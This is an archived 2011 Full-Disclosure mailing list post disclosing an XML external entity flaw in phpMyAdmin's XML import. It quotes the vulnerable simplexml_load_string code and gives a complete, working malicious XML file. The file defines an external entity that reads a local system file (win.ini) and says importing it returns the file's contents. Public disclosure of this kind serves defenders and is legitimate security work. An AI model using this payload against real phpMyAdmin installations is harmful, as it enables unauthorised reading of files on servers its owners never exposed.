| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Wed, 2 Nov 2011 15:30:56 +0800
From: WooYun <root@...yun.org>
To: full-disclosure@...ts.grok.org.uk
Subject: PhpMyAdmin Arbitrary File Reading
Hi
80sec report this bug on wooyun,PhpMyadmin use a simplexml_load_string
function to read xml from user input,this may be exploied to read files
from the server or network
in libraries/import/xml.php,some code like this
/**
* Load the XML string
*
* The option LIBXML_COMPACT is specified because it can
* result in increased performance without the need to
* alter the code in any way. It's basically a freebee.
*/
$xml = simplexml_load_string($buffer, "SimpleXMLElement", LIBXML_COMPACT);
unset($buffer);
/**
* The XML was malformed
*/
if ($xml === FALSE) {
so you just need to make a xml like this
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE wooyun [
<!ENTITY hi80sec SYSTEM "file:///c:/windows/win.ini">
]>
<pma_xml_export version="1.0" xmlns:pma="
http://www.phpmyadmin.net/some_doc_url/">
<!--
- Structure schemas
-->
<pma:structure_schemas>
<pma:database name="test" collation="utf8_general_ci"
charset="utf8">
<pma:table name="ts_ad">
&hi80sec;
</pma:table>
</pma:database>
</pma:structure_schemas>
<!--
- 数据库: 'thinksns'
-->
<database name="thinksns">
<!-- 表 ts_ad -->
</database>
</pma_xml_export>
then import this xml in PhpMyAdmin,you will get the content you want.
From:http://www.wooyun.org/bugs/wooyun-2010-03185
:)
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists